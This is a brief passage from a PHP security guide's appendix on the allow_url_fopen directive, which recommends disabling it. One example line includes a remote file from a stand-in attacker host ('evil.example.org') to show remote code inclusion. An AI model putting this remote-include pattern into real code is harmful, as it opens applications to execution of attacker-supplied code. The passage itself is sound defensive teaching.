A.1. allow_url_fopenAs illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they are local files:
<?php
$contents = file_get_contents('http://example.org/xss.html');
?>
Chapter 5 reveals how dangerous this is when combined with the use of include or require:
<?php
include 'http://evil.example.org/evil.inc';
?>
I recommend disabling allow_url_fopen unless your application requires it. |